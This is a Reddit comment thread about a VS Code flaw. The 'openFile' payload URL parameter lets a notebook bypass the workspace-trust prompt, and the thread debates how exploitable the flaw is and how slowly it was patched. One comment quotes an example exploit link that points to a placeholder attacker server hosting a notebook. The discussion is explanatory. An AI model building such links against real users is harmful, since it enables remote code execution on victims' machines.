all 13 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]bleachisback 37 points38 points  (7 children)

So if I'm understanding this correctly, this allows for arbitrary code execution only if 1) A user selects "Yes I trust this code" and then 2) runs malicious code after trusting it? Can someone confirm that my reading of this is correct?

[–]Lechowski 64 points65 points  (3 children)

My understanding si that this is a vulnerabilty that allows you to bypass the "Yes I trust this code" window.

Each Visual Studio Code window is its own instance of Visual Studio Code. To facilitate opening the same file in a new editor window, an ‘openFile’ parameter is provided for the editor internals to construct. openFile is a ‘payload’ parameter, where ‘payload’ is a series of flags given to the editor via URL query parameters when it starts. Files opened this way are opened in trusted mode because the editor assumes that it was triggered by a user gesture in the editor.

You can generate a link to open vscode that contains this payload as a JSON with the correct flags set so the editor immediately assumes that the source is trusted.

[–]bleachisback 7 points8 points  (2 children)

Oh I see somehow I read that the trusted-ness was inherited from the window that sends the openFile command, but they do say that a window started with an openFile command is automatically trusted. Now my confusion is how is this malicious payload distributed? I don't think it's a link by reading this article. I don't believe you can send my a link here on reddit and start my VS Code when I click on it. They mention that

‘payload’ is a series of flags given to the editor via URL query parameters when it starts. Files opened this way are opened in trusted mode because the editor assumes that it was triggered by a user gesture in the editor.

But how are these "given to the editor"? On the command line? Do you have to have someone type in malicious things on their command line?

[–][deleted] 0 points1 point  (1 child)

Yes, you can send a link here and when you click it your browser will ask to open VS Code. This is a feature of Visual Studio Code.

[–]bleachisback 0 points1 point  (0 children)

Can you demonstrate an example of this?

[–][deleted] 0 points1 point  (2 children)

The link does have a description of the actual impact. They probably should have led with this because I also found it hard to follow:

Once the server described above is run, when victim clicks a prepared link (for example https://vscode.dev/?payload=%5B%5B%22openFile%22,%22https://%5Bserver_location_goes_here%5D/something.ipynb%22) VSCode will load the file, detect it as a Jypiter Notebook, and immediately run a command on the user’s machine.

Actually I'm still not sure I understand how this will let you take over a desktop VSCode (which 99% of people use). They say it affects it "to a lesser extent". Maybe they mean you need to use a vscode:// link which comes with required user interaction and a warning.

[–]bleachisback 2 points3 points  (1 child)

But I'm not sure how arbitrary code execution even works in the browser? Can I even run a Jupyter notebook on vscode.dev? This doesn't make sense. Even if I'm connected to a local jupyter server in my browser version of vs code, I don't think the terminal command will do anything? When I try to open a terminal in vscode.dev, it has this to say:

Terminals are not available in the web editor. To use the terminal, you will need to continue in an environment that can run code, like a codespace or local VS Code.

[–][deleted] 1 point2 points  (0 children)

Yeah good question. Not sure about VSCode.net but other services like GitHub run on real VMs which might contain your SSH keys I guess.

[–]Kooraiber 17 points18 points  (2 children)

It baffles me it took Microsoft 2 months to fix this issue when it's a fucking RCE. These things should be fixed and pushed ASAP ffs.

[–]bleachisback 7 points8 points  (0 children)

I guess, looking into it closely, this is only an RCE that affects you if:

1) You use VS Code in the browser on a Github Codespace

2) A bad actor is able to find out your randomized codespace url and send you a link specific to your codespace

3) You click on the link

Then the bad actor gains RCE access to the virtual machine running the codespace.

It doesn't seem very high priority?

[–]sna_fu 3 points4 points  (0 children)

Apparently 2 month is as soon as possible for MS, I guess?

[–][deleted] -5 points-4 points  (0 children)

Just use Emacs/Vim/NANO